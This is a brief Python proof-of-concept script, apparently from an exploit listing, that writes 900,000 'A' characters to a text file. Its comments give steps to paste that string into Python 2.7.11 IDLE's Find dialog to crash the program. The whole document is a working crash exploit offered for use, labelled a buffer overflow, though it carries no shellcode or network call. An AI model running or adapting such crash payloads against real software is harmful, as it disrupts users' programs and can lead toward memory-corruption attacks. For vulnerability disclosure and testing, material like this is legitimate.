#!/usr/bin/env python # Website : http://www.python.org/idle/ # Platform : Windows 7 / Windows 8.1 / Windows 10 # Author : Soufiane Boussali # Email : Soufiane.boussali@efet.ac.ma # WebSite : https://hacker404.github.io # # Reproducte Steps # 1 . run python code : python poc.py # 2 . open hacker404.txt and copy content to clipboard # 3 . open "python 2.7.11 IDLE" # 4 . from Menu (edit --> find) # 5 . Paste ClipBoard on "find" # 6 . Enter # 7 . Crashed crash = "\x41"*900000 #B0F file = open("hacker404.txt", "w") file.write(crash) file.close()